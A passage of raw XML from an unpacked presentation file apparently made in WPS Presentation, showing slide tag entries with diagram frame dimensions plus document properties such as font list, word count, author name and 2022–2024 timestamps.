  <p:tag name="KSO_WPP_MARK_KEY" val="0e664177-db40-4a67-8795-45a210798d9a"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiNTlkNzUyODEyYzdlNzQ1OTFjMzMzYTZhZTY4ZDUwNGIifQ=="/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}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4987</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>244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Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>思源黑体 CN Medium</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Helvetica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王峥</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-16T14:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-26T00:20:12Z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B5DF9048099A4E24B816AB5DB761BDCC_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.14036</vt:lpwstr>
  </property>
</Properties>
</file>